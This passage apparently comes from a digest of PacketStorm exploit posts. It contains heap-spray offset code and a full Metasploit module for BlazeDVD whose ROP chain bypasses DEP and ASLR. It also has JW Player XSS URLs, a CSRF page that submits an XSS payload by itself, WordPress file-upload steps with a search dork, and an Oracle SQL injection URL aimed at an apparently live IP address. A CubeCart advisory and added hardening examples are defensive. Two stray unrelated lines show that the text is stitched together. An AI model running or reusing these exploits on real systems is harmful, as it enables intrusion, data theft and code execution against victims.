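// Character offset that places the first payload byte exactly at targetAddr.
function requiredOffsetChars(targetAddr, headerBytes) {
  const inPeriod = targetAddr & 0xfff;            // position inside a 0x1000-byte period
  const dataBytes = inPeriod - headerBytes;       // string bytes preceding the payload
  if (dataBytes < 0 || dataBytes % 2 !== 0) {
    throw new Error("address not reachable with a whole-character offset");
  }
  return dataBytes / 2;
}

// Build one spray block with the modules' own string logic:
// offset + code + nops padded to 0x800 chars, doubled to 0x40000, cut to (0x80000-6)/2.
function buildSprayBlock(offsetChars, code, nopChar) {
  let nops = nopChar;
  while (nops.length < 0x80000) nops += nops;
  const offset = nops.substring(0, offsetChars);
  let shellcode = offset + code + nops.substring(0, UNIT_CHARS - code.length - offset.length);
  while (shellcode.length < 0x40000) shellcode += shellcode;
  return shellcode.substring(0, BLOCK_CHARS);
}

// Every character index at which the payload starts inside the block.
function payloadStarts(block, code) {
  const starts = [];
  for (let i = block.indexOf(code); i !== -1; i = block.indexOf(code, i + 1)) starts.push(i);
  return starts;
}

// True when the payload sits at offsetChars in every 0x800-character unit of the block,
// which is what lets a pointer such as 0x0c0c0b30 hit payload whichever copy it lands in.
function payloadAlignedInEveryUnit(block, code, offsetChars) {
  const starts = payloadStarts(block, code);
  const expected = Math.floor((BLOCK_CHARS - offsetChars - code.length) / UNIT_CHARS) + 1;
  return starts.length === expected && starts.every((s, k) => s === offsetChars + k * UNIT_CHARS);
}

// The three (address, header) pairs used by the modules on this page.
function offsetTable() {
  return {
    ie8_0c0c0b30: requiredOffsetChars(0x0c0c0b30, HEADER_BYTES_IE8),
    ie8_0c0c0c0c: requiredOffsetChars(0x0c0c0c0c, HEADER_BYTES_IE8),
    ie9_0c0c0c0c: requiredOffsetChars(0x0c0c0c0c, HEADER_BYTES_IE9),
  };
}

// Stand-alone run: "PAYLOAD!" and the 0x0c0c filler are constructed placeholders.
const demoBlock = buildSprayBlock(0x586, "PAYLOAD!", "\u0c0c");
console.log(offsetTable(), payloadAlignedInEveryUnit(demoBlock, "PAYLOAD!", 0x586));
```

The check that matters operationally is payloadAlignedInEveryUnit: if the unit length, the header size or the code length change, the payload drifts inside the period and the spray address points into filler instead of code, which is exactly the failure the modules' fixed 0x800-character padding is there to prevent.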
  13. This Metasploit module updates an existing MSF module originally written for BlazeDVD 5.1. The new module bypasses DEP and ASLR on version 6. The original vulnerability is in the handling of specially crafted PLF files; exploiting it allows arbitrary code execution in the context of the user.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass',
      'Description'    => %q{
          This module updates an existing MSF module originally written for BlazeDVD 5.1.
        The new module will bypass DEP and ASLR on version 6. The original vulnerability
        is due to the handling of specially crafted PLF files. Exploiting this allows us
        to execute arbitrary code running under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gjoko Krstic',          # Original discovery
          'Craig Freyman @cd1zz',  # MSF Module
        ],
      'References'     =>
        [
          [ 'OSVDB', '30770' ],
          [ 'CVE', '2006-6199' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/6217/' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/13905/' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/9329/' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/16618/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process',
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'        => "\x00\x0a\x1a\x2f\x3a\x5c",
          'DisableNops'     => true,
          'StackAdjustment' => -3500
        },
      'Targets'        =>
        [
          [ 'win',
            {
              'Ret'    => 0x6030ef6c, # : {pivot 2352 / 0x930} : # POP ESI # ADD ESP,92C # RETN
              'Offset' => 872
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 10 2008',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),], self.class)
  end

  def create_rop_chain()
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
    [
      0x640258bf, # POP EAX # RETN [MediaPlayerCtrl.dll]
      0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
      0x6033d8be, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
      0x60327f7f, # POP EBP # RETN [Configuration.dll]
      0x616069a1, # & push esp # ret 04 [EPG.dll]
      0x60335f98, # POP EAX # RETN [Configuration.dll]
      0xfffffdff, # Value to negate, will become 0x00000201
      0x6404c4c3, # NEG EAX # RETN [MediaPlayerCtrl.dll]
      0x64016676, # XCHG EAX,EBX # RETN [MediaPlayerCtrl.dll]
      0x6410948f, # POP EAX # RETN [NetReg.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x6033b0eb, # NEG EAX # RETN [Configuration.dll]
      0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
      0x6033d975, # POP ECX # RETN [Configuration.dll]
      0x6411c001, # &Writable location [NetReg.dll]
      0x6410a85d, # POP EDI # RETN [NetReg.dll]
      0x6160b805, # RETN (ROP NOP) [EPG.dll]
      0x6402c108, # POP EAX # RETN [MediaPlayerCtrl.dll]
      0x90909090, # nop
      0x6033d886, # PUSHAD # RETN [Configuration.dll]
    ].flatten.pack("V*")
    return rop_gadgets
  end

  def exploit
    rop_chain    = create_rop_chain()
    stack_adjust = "\x81\xc4\x24\xfa\xff\xff"

    buf = ''
    buf << make_nops(target['Offset'])
    buf << [target.ret].pack('V')
    buf << make_nops(8) #filler for stack pivot
    buf << rop_chain
    buf << stack_adjust
    buf << payload.encoded
    buf << make_nops(5000 - buf.length)

    file_create(buf)
  end

end

Source: PacketStorm
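The mona.py chain above is the classic PUSHAD-to-VirtualProtect pattern: each POP loads one register, the two NEG gadgets turn 0xfffffdff and 0xffffffc0 into 0x201 and 0x40 without placing NUL bytes in the PLF file (0x00 is a bad character for this target), and PUSHAD dumps all eight registers so that they form the VirtualProtect call frame. The model below is an added example, not code from the module, from mona.py or from BlazeDVD. It walks the posted chain through a tiny symbolic x86 stack machine whose gadget semantics are transcribed from the comments in the chain; the stack base, the value stored in the IAT slot and the payload are constructed placeholders, so only the register arithmetic and the resulting call frame are meaningful.

```javascript
// Added example (not from the module, mona.py or BlazeDVD): symbolic walk of the
// PUSHAD/VirtualProtect ROP chain posted above. Gadget semantics come from the chain's
// own comments; no real DLL code is executed.
const u32 = (x) => x >>> 0;

// ASSUMPTIONS (constructed for the model, not from the page):
const STACK_BASE     = 0x0012f000;  // fake address of the first chain dword
const VIRTUALPROTECT = 0x7c801ad4;  // fake value sitting in the IAT slot 0x10011108
// Values that are on the page:
const IAT_SLOT     = 0x10011108;    // ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
const PUSH_ESP_RET = 0x616069a1;    // & push esp # ret 04 [EPG.dll]

// Gadget table keyed by the chain's addresses, semantics from its comments.
const GADGETS = {
  0x640258bf: { op: "pop", reg: "eax" },
  0x6033d8be: { op: "mov_esi_mem_eax" },
  0x60327f7f: { op: "pop", reg: "ebp" },
  0x60335f98: { op: "pop", reg: "eax" },
  0x6404c4c3: { op: "neg", reg: "eax" },
  0x64016676: { op: "xchg", a: "eax", b: "ebx" },
  0x6410948f: { op: "pop", reg: "eax" },
  0x6033b0eb: { op: "neg", reg: "eax" },
  0x61608ba2: { op: "xchg", a: "eax", b: "edx" },
  0x6033d975: { op: "pop", reg: "ecx" },
  0x6410a85d: { op: "pop", reg: "edi" },
  0x6160b805: { op: "ret" },
  0x6402c108: { op: "pop", reg: "eax" },
  0x6033d886: { op: "pushad" },
};

// The chain exactly as posted (values only, comments omitted).
const ROP_CHAIN = [
  0x640258bf, 0x10011108, 0x6033d8be, 0x60327f7f, 0x616069a1,
  0x60335f98, 0xfffffdff, 0x6404c4c3, 0x64016676, 0x6410948f,
  0xffffffc0, 0x6033b0eb, 0x61608ba2, 0x6033d975, 0x6411c001,
  0x6410a85d, 0x6160b805, 0x6402c108, 0x90909090, 0x6033d886,
];

// Execute gadgets until control returns into VirtualProtect; return the frame it sees.
function runChain(chain) {
  const mem = new Map();                                   // dword-addressed memory
  mem.set(IAT_SLOT, VIRTUALPROTECT);
  chain.forEach((v, i) => mem.set(STACK_BASE + 4 * i, u32(v)));
  const afterChain = STACK_BASE + 4 * chain.length;        // where stack_adjust + payload begin
  const r = { eax: 0, ebx: 0, ecx: 0, edx: 0, esp: STACK_BASE, ebp: 0, esi: 0, edi: 0 };
  const rd = (a) => { const v = mem.get(u32(a)); return v === undefined ? 0 : v; };
  const pop = () => { const v = rd(r.esp); r.esp = u32(r.esp + 4); return v; };
  const push = (v) => { r.esp = u32(r.esp - 4); mem.set(r.esp, u32(v)); };

  for (let steps = 0; steps < 64; steps++) {
    const eip = pop();                                     // every gadget ends in RETN
    if (eip === VIRTUALPROTECT) {
      // stdcall frame on entry: [ret][lpAddress][dwSize][flNewProtect][lpflOldProtect]
      return {
        returnAddress:  rd(r.esp),
        lpAddress:      rd(r.esp + 4),
        dwSize:         rd(r.esp + 8),
        flNewProtect:   rd(r.esp + 12),
        lpflOldProtect: rd(r.esp + 16),
        afterChain,
      };
    }
    const g = GADGETS[eip];
    if (!g) throw new Error("returned into unknown address 0x" + eip.toString(16));
    switch (g.op) {
      case "pop":  r[g.reg] = pop(); break;
      case "ret":  break;                                  // ROP NOP
      case "neg":  r[g.reg] = u32(-r[g.reg]); break;       // two's complement negate
      case "xchg": [r[g.a], r[g.b]] = [r[g.b], r[g.a]]; break;
      case "mov_esi_mem_eax": r.esi = rd(r.eax); break;
      case "pushad": {
        const saved = r.esp;                               // PUSHAD stores the pre-push ESP
        for (const v of [r.eax, r.ecx, r.edx, r.ebx, saved, r.ebp, r.esi, r.edi]) push(v);
        break;
      }
    }
  }
  throw new Error("chain did not reach VirtualProtect");
}

console.log(runChain(ROP_CHAIN));
```

The frame the model recovers explains the chain's shape: ESI holds the VirtualProtect pointer so that the RETN popped after PUSHAD (EDI = the ROP NOP) lands in it, EBP supplies the return address (push esp # ret 04), the saved ESP becomes lpAddress and points at the bytes right after the chain, and EBX/EDX carry dwSize 0x201 and PAGE_EXECUTE_READWRITE 0x40. After VirtualProtect's ret 0x10, ESP is at the EAX slot, so "push esp # ret" transfers execution into the 0x90909090 nops there, which fall through into stack_adjust and the payload, which is why the chain loads nops into EAX.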
  14. 33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities. Hello list! Earlier I've wrote to the list about multiple vulnerabilities in multiple themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In that later I've mentioned 16 themes by RocketTheme (with Rokbox): Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian. I've wrote about 14 themes + 2 variations of 2 themes by these developers, but they have 47 themes for WordPress in total. Among them only three are free, and all other themes from RocketTheme are paid ones (it's needed to buy subscription to the club to receive access to them). And Rokbox is bundled with all these themes, except Grunge, which have all earlier-mentioned vulnerabilities. So I inform you about multiple vulnerabilities in 33 new themes for WordPress, which are developed by RocketTheme (Rokbox's developers). These are Content Spoofing, Cross-Site Scripting, Full path disclosure and Information Leakage vulnerabilities. ------------------------- Affected products: ------------------------- In these 32 themes (in addition to previous 16) there are Cross-Site Scripting, Content Spoofing, Full path disclosure and Information Leakage vulnerabilities. And Grunge theme has FPD holes. These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere, Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge. Affected all versions of these themes for WordPress. Since August I've informed the developers many times concerning vulnerabilities in Rokbox and their themes with it. 
      ----------
      Details:
      ----------

      Content Spoofing (WASC-12):

      In the parameter file, both video and audio files can be set. The swf file of JW Player accepts arbitrary addresses in the parameters file and image, which allows spoofing the content of the flash, i.e. by setting addresses of video (audio) and/or image files from another site.

      http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

      http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv?=1.jpg

      Content Spoofing (WASC-12):

      The swf file of JW Player accepts arbitrary addresses in the parameter config, which allows spoofing the content of the flash, i.e. by setting the address of a config file from another site (the parameters file and image in the xml file accept arbitrary addresses). For loading a config file from another site, it needs to have crossdomain.xml.

      http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

      1.xml

      <config>
      <file>1.flv</file>
      <image>1.jpg</image>
      </config>

      Content Spoofing (WASC-12):

      http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

      XSS (WASC-08):

      http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

      Full path disclosure (WASC-13):

      In all these themes there is FPD in index.php (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for the other themes), which works at default PHP settings. Also there are potentially FPD in other php files of these themes.

      Information Leakage (WASC-13):

      In some themes, similar to rt_mixxmag_wp, there can be an error log with full paths.

      http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

      Best wishes & regards,
      MustLive
      Administrator of Websecurity web site
      http://websecurity.com.ua

      Source: PacketStorm
  15. WordPress SB Uploader version 3.9 suffers from an arbitrary file upload vulnerability.

      # Exploit Title: WordPress SB Uploader 3.9 Arbitrary File Upload Vulnerability
      # Exploit Author: Evil aXe
      # http://www.facebook.com/iChocolate.lips
      # Date: 30/12/12
      # Greetz: R3x0Man, Shadman tanjim, Shahee Mirza, JingoBD, ManInDark And All Crew and Members of Bangladesh Cyber Army.
      # Software Link: http://wordpress.org/extend/plugins/sb-uploader/
      # Version: 3.9
      # Category: webapps
      # Tested on: [Windows 7]
      # Google Dork : "inurl:plugins/sb-uploader"

      =====================
      Vulnerability : Arbitrary File Upload Vulnerability
      =====================
      Exploit Details :
      =====================
      1. Register
      2. Login [Confirm your email then login]
      3. Add a New post
      4. Write title, body, whatever you want
      5. Look at the right sidebar "SB Uploader" panel and upload your file
      6. Publish the post
      7. Your file is uploaded here : /wp/wp-content/uploads/2012/02/yourfile[.]ext
      =====================
      p0c: localhost/wp/wp-content/uploads/2012/12/cOol.htm
      =====================
      ♥ BCA ♥

      Source: PacketStorm
  16. WordPress Photo Plus / Photo Search version 4.8.11 suffers from cross site request forgery and cross site scripting vulnerabilities.

      # Exploit Title: WordPress Photo Plus, Photo Search XSS/CSRF Vulnerability
      # Google Dork:
      # Date: 29/12/12
      # Exploit Author: k3170makan
      # Vendor Homepage: http://wordpress.org/extend/plugins/wp-photo-album-plus/
      # Software Link: http://wordpress.org/extend/plugins/wp-photo-album-plus/
      # Version: 4.8.11
      # Tested on: Ubuntu 10.04

      The WordPress Photo Plus plugin suffers from an XSS/CSRF vulnerability in the "Search Photos" function.

      Code: extract from wp-photo-album-plus.php (lines 42-47), in the widget function
      --------------------------------------------------------------------------------------------------------------------------------
      <form id="wppa_searchform" action="<?php echo($pagelink) ?>" method="post" class="widget_search">
      <div>
      <?php echo $instance['label'] ?>
      <input type="text" name="wppa-searchstring" id="wppa_s" value="<?php echo $wppa[ 'searchstring'] ?>" />
      <input id = "wppa_searchsubmit" type="submit" value="<?php _e('Search', 'wppa'); ?>" />
      </div>
      ---------------------------------------------------------------------------------------------------------------------------------

      The above code fails to sanitize the $wppa['searchstring'] variable, allowing attackers to inject harmful HTML elements and JavaScript code.
      Submissions to this form can also be made from any domain, which actually aids in the exploitation of the vulnerability; thus this is classified as a CSRF vulnerability.

      Exploit Code:

      The exploit requires an attacker to forge a POST request to this form; this can be done by using the following HTML page
      --------------------------------------------------------------------------------------------------------------------------------
      <html>
      <body onload="xss()">
      <form name="f" id="wppa_searchform" action="http://[domain name]/[photo search page path]" method="post" class="widget_search">
      <input type="text" name="wppa-searchstring" id="wppa_s" value='"><script>alert(1);</script><textarea>'>
      <input name="s" id="wppa_searchsubmit" type="submit" value="Search">
      </form>
      <script>
      function xss(){
      document.f.s.click();
      }
      </script>
      </body>
      </html>
      --------------------------------------------------------------------------------------------------------------------------------

      [photo search page path] can be obtained by reading the path set in the original photo search form attributes

      --
      <Keith k3170makan <http://about.me/k3170makan> Makan/>

      Source: PacketStorm
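As an added example (not the plugin's own code), the widget markup from the extract rendered once as the advisory shows it and once with attribute-context escaping; the helpers `render_search_form_vulnerable()`, `render_search_form_fixed()` and `contains_live_script()` are hypothetical, and `htmlspecialchars()` stands in for WordPress's `esc_attr()`. With escaping in place, a POST from another origin can still submit a search but can no longer break out of the `value` attribute.

```php
<?php
// Added example, not the plugin's own code. Both render helpers are
// hypothetical and rebuild the widget's <form> with and without escaping.

// Mirrors the vulnerable extract: $searchstring is echoed raw inside a
// double-quoted attribute, so a value beginning with "> closes the attribute
// and the <input>, and whatever follows becomes live page markup.
function render_search_form_vulnerable(string $pagelink, string $searchstring): string
{
    return '<form id="wppa_searchform" action="' . $pagelink . '" method="post" class="widget_search">'
         . '<input type="text" name="wppa-searchstring" id="wppa_s" value="' . $searchstring . '" />'
         . '</form>';
}

// Attribute-context escaping, a stand-in for WordPress esc_attr(). ENT_QUOTES
// converts both quote styles, so the attribute cannot be terminated early;
// < and > are converted as well, so no element can be opened inside it.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened rendering: every dynamic value passes through attr() before it is
// placed in an attribute, the action URL included.
function render_search_form_fixed(string $pagelink, string $searchstring): string
{
    return '<form id="wppa_searchform" action="' . attr($pagelink) . '" method="post" class="widget_search">'
         . '<input type="text" name="wppa-searchstring" id="wppa_s" value="' . attr($searchstring) . '" />'
         . '</form>';
}

// Review check: does the rendered markup still carry an unescaped <script
// element once the proof-of-concept string has been submitted?
function contains_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed input modelled on the advisory's proof of concept.
$payload = '"><script>alert(1);</script><textarea>';

printf("vulnerable rendering carries live script: %s\n",
       contains_live_script(render_search_form_vulnerable('/photos/', $payload)) ? 'yes' : 'no');
printf("escaped rendering carries live script:    %s\n",
       contains_live_script(render_search_form_fixed('/photos/', $payload)) ? 'yes' : 'no');
```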
  17. The ERP (Enterprise Resource Planning) system from Sida University System suffers from a remote SQL injection vulnerability.

      # Exploit Author: Shahram Darvishvand [karaji_kt21] <darvishvand.shahram[at]gmail[dot]com>
      # Exploit Title: [erp (Enterprise Resource Planning) SQL Injection Vulnerability ]
      # Vendor : sida university system
      # Date: [4/May/2012]
      # Google Dork: "نرم افزار جامع erp شامل قوانین کپی رایت می باشد و نوع نسخه بتا می باشد"
      # Version: [ 1389/09/17 ]
      # Tested on: [ASHX .. Application powered by Oracle DBMS]

      ============================================================
      ** This Vulnerability Is On version 1389/09/17 **
      --------------------------------------------
      Exploit :
      http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
      =============================================================
      Example :
      http://[IP Or Domain]/Portal/WUC/daily.ashx?title= 'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

      Response :
      Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit
      ==========================================================
      [+] Greetz : Fahime.Saveh , Behrooz_Ice
      ********************************
      For Screen shot 1 :
      http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

      For Screen Shot 2 :
      http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

      Source: PacketStorm
  18. That's me, man, it's not tinkode. What part of that didn't you understand?!
  19. We don't make money on the internet
  20. CubeCart versions 5.0.7 and below suffer from an insecure backup file handling vulnerability.

      1. OVERVIEW

      CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup File Handling, which leads to the disclosure of the application configuration file.

      2. BACKGROUND

      CubeCart is an "out of the box" ecommerce shopping cart software solution which has been written to run on servers that have PHP & MySQL support. With CubeCart you can quickly set up a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world.

      3. VULNERABILITY DESCRIPTION

      CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs up the configuration file, "global.inc.php", upon a new installation or upgrade process. The name of the backup configuration file is set to the year, month, day, hour and minute that the process is performed. The non-randomized nature of this backup scheme allows an attacker to retrieve the file through a brute-force method.

      4. VERSIONS AFFECTED

      5.0.7 and lower versions

      5. AFFECTED FILES

      /setup/setup.install.php
      /setup/setup.upgrade.php

      ///////////CODE //////////////
      ##Backup existing config file, if it exists
      if (file_exists($global_file)) {
          rename($global_file, $global_file.'-'.date('Ymdgi'));
      }
      /////////////////////////

      e.g. http://127.0.0.1/cube507/includes/global.inc.php-2012021245719

      6. SOLUTION

      Upgrade to the latest CubeCart version - 5.x.

      7. VENDOR

      CubeCart Development Team
      http://cubecart.com/

      8. CREDIT

      Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

      9. DISCLOSURE TIME-LINE

      2012-03-24: Vulnerability reported
      2012-12-28: Vulnerability disclosed

      10. REFERENCES

      Original Advisory URL:
      http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup

      CubeCart Home Page:
      http://cubecart.com/

      #yehg [2012-12-28]

      ---------------------------------
      Best regards,
      YGN Ethical Hacker Group
      Yangon, Myanmar
      http://yehg.net
      Our Lab | http://yehg.net/lab
      Our Directory | http://yehg.net/hwd

      Source: YGN Ethical Hacker Group :: Security Research
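As an added example (not CubeCart's code), the advisory's clock-based backup beside a hardened variant that moves the copy outside the document root under a CSPRNG-derived name; `backup_config_vulnerable()`, `backup_config_secure()` and the temp-directory paths are hypothetical, and the demo never calls the vulnerable variant so nothing is renamed into a served location.

```php
<?php
// Added example, not CubeCart's own code. Both functions are hypothetical;
// the demo paths below are constructed under the system temp directory.

// The advisory's scheme: the backup stays beside global.inc.php (inside the
// web root) and its suffix is date('Ymdgi'), i.e. year, month, day, 12-hour
// clock hour and minute. Anyone who can bound the install time to a day has
// only the minutes of that day to try, and the web server serves the file.
function backup_config_vulnerable(string $global_file): string
{
    $dest = $global_file . '-' . date('Ymdgi');
    rename($global_file, $dest);
    return $dest;
}

// Hardened scheme: the copy goes to a directory outside the document root,
// the name carries 16 bytes from random_bytes() (128 bits, not guessable),
// and the file is owner-only so a local user cannot read it either.
function backup_config_secure(string $global_file, string $backup_dir): string
{
    if (!is_dir($backup_dir) && !mkdir($backup_dir, 0700, true)) {
        throw new RuntimeException("cannot create backup directory $backup_dir");
    }
    $dest = $backup_dir . '/global.inc.php.' . bin2hex(random_bytes(16)) . '.bak';
    if (!rename($global_file, $dest)) {
        throw new RuntimeException("backup of $global_file failed");
    }
    chmod($dest, 0600);
    return $dest;
}

// Constructed demo layout: $docroot stands for the web root, and the backup
// directory is its sibling, so no URL maps to the copy.
$docroot     = sys_get_temp_dir() . '/cubecart-demo/htdocs';
$backup_dir  = sys_get_temp_dir() . '/cubecart-demo/config-backups';
$global_file = $docroot . '/includes/global.inc.php';

if (!is_dir(dirname($global_file))) {
    mkdir(dirname($global_file), 0700, true);
}
file_put_contents($global_file, "<?php \$glob['dbpassword'] = 'constructed-secret';\n");

$copy = backup_config_secure($global_file, $backup_dir);
printf("backup written outside the web root: %s (mode %o)\n", $copy, fileperms($copy) & 0777);
```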